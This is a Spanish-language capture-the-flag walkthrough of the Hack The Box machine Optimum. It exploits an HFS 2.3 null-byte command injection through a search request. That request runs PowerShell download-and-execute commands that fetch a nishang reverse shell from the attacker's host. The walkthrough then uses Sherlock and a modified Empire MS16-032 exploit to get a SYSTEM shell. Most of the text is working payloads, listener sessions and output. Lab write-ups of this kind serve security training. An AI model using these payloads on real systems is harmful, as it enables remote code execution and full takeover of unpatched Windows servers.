Esta maquina funciona con Windows. Hay que tener mucho cuidado con el encoding. No me estaba funcionando por eso.
Como siempre empezamos con un Nmap

root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-02 19:42 CET
Nmap scan report for 10.10.10.8
Host is up (0.024s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http	HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Vemos que esta corriendo HttpFileServer httpd 2.3. Buscando en google vemos que tiene una vulnerabilidad en el search usando null byte. Por lo que si hacemos

GET /?search=%2500{.exec|ping+10.10.14.6} HTTP/1.1

Recibimos un ping

root@Kali2:~/Desktop# tcpdump -i tun0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
19:55:00.648169 IP Kali2.55208 > 10.10.10.8.http: Flags [S], seq 311197498, win 29200, options [mss 1460,sackOK,TS val 2554504713 ecr 0,nop,wscale 7], length 0
19:55:00.672238 IP 10.10.10.8.http > Kali2.55208: Flags [S.], seq 565428027, ack 311197499, win 8192, options [mss 1357,nop,wscale 8,sackOK,TS val 83371 ecr 2554504713], length 0

Podemos ejecutar un powershell comand (tiene que ir URL encoded) para ejecutar una reverse shell de nishang

GET /?search=%00{.exec|c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6:8000/powershellreverse2.ps1').} HTTP/1.1
Host: 10.10.10.8

Y eso nos da una shell

root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.8] 49162
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
Optimum\kostas

PS C:\Users\kostas\Desktop> systeminfo

Host Name:             	OPTIMUM
OS Name:               	Microsoft Windows Server 2012 R2 Standard
OS Version:            	6.3.9600 N/A Build 9600
OS Manufacturer:       	Microsoft Corporation
OS Configuration:      	Standalone Server
OS Build Type:         	Multiprocessor Free
Registered Owner:      	Windows User
Registered Organization:   
Product ID:            	00252-70000-00000-AA535
Original Install Date: 	18/3/2017, 1:51:36 ??
System Boot Time:      	9/11/2019, 6:58:56 ??
System Manufacturer:   	VMware, Inc.
System Model:          	VMware Virtual Platform
System Type:           	x64-based PC
Processor(s):          	1 Processor(s) Installed.
                       	[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:          	Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:     	C:\Windows
System Directory:      	C:\Windows\system32
Boot Device:           	\Device\HarddiskVolume1
System Locale:         	el;Greek
Input Locale:          	en-us;English (United States)
Time Zone:             	(UTC+02:00) Athens, Bucharest
Total Physical Memory: 	4.095 MB
Available Physical Memory: 3.275 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.706 MB
Virtual Memory: In Use:	797 MB
Page File Location(s): 	C:\pagefile.sys
Domain:                	HTB
Logon Server:          	N/A
Hotfix(s):             	31 Hotfix(s) Installed.
                       	[01]: KB2959936
                       	[02]: KB2896496
                       	[03]: KB2919355
                       	[04]: KB2920189
                       	[05]: KB2928120
                       	[06]: KB2931358
                       	[07]: KB2931366
                       	[08]: KB2933826
                       	[09]: KB2938772
                       	[10]: KB2949621
                       	[11]: KB2954879
                       	[12]: KB2958262
                       	[13]: KB2958263
                       	[14]: KB2961072
                       	[15]: KB2965500
                       	[16]: KB2966407
                       	[17]: KB2967917
                       	[18]: KB2971203
                       	[19]: KB2971850
                       	[20]: KB2973351
                       	[21]: KB2973448
                       	[22]: KB2975061
                       	[23]: KB2976627
                       	[24]: KB2977629
                       	[25]: KB2981580
                       	[26]: KB2987107
                       	[27]: KB2989647
                       	[28]: KB2998527
                       	[29]: KB3000850
                       	[30]: KB3003057
                       	[31]: KB3014442
Network Card(s):       	1 NIC(s) Installed.
                       	[01]: Intel(R) 82574L Gigabit Network Connection
                             	Connection Name: Ethernet0
                             	DHCP Enabled:	No
                             	IP address(es)
                             	[01]: 10.10.10.8
Hyper-V Requirements:  	A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Despues de eso podemos usar sherlock

PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8001/SherlockAllchecks.ps1')


Title  	: User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID  	: 2010-0232
Link   	: https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title  	: Task Scheduler .XML
MSBulletin : MS10-092
CVEID  	: 2010-3338, 2010-3888
Link   	: https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title  	: NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID  	: 2013-1300
Link   	: https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title  	: TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID  	: 2013-3881
Link   	: https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title  	: TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID  	: 2014-4113
Link   	: https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title  	: ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID  	: 2015-1701, 2015-2433
Link   	: https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title  	: Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID  	: 2015-2426, 2015-2433
Link   	: https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title  	: 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID  	: 2016-0051
Link   	: https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title  	: Secondary Logon Handle
MSBulletin : MS16-032
CVEID  	: 2016-0099
Link   	: https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title  	: Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID  	: 2016-0093/94/95/96
Link   	: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
         	6-034?
VulnStatus : Appears Vulnerable

Title  	: Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID  	: 2016-7255
Link   	: https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
         	ample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title  	: Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID  	: 2017-7199
Link   	: https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
         	tml
VulnStatus : Not Vulnerable

Sherlock nos muestra vulnerabilidades que pueden ser explotadas con Empire.

Bajamos el exploit de

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1

y le añadimos esta linea (para ejecutar otra shell de nishang)

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.9:8001/powershellreverse3.ps1')"
PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8001/MS16032.ps1')   
 	__ __ ___ ___   ___ 	___ ___ ___
	|  V  |  _|_  | |  _|___|   |_  |_  |
	| 	|_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
                                   	 
               	[by b33f -> @FuzzySec]

[!] Holy handle leak Batman, we have a SYSTEM shell!!

Si escuchamos con NC

root@Kali2:~/Desktop# nc -nlvp 668
listening on [any] 668 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.8] 49173
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
nt authority\system

Listo. La primera vez fue con metasploit esta fue sin tanta ayuda 🙂